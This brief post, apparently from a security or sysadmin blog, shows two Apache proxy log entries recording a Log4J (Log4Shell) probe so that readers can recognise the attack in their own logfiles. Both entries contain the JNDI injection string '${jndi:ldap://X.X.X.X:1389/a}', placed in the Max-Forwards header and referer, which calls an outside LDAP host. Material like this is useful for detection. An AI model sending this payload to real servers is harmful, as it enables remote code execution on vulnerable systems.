Log4J Attack in Logfiles

Here you can see how an Log4J Attack may look in logfiles of your system.

[Fri Jan 28 03:42:04.636333 2022] [proxy:warn] [pid 30819] [client 98.0.242.10:46192] AH10188: Max-Forwards value '${jndi:ldap://X.X.X.X:1389/a}' could not be parsed, referer: ${jndi:ldap://X.X.X.X:1389/a}
[Fri Jan 28 03:42:04.636394 2022] [proxy:error] [pid 30819] [client 98.0.242.10:46192] AH00898: Max-Forwards request header could not be parsed returned by /index.php, referer: ${jndi:ldap://X.X.X.X:1389/a}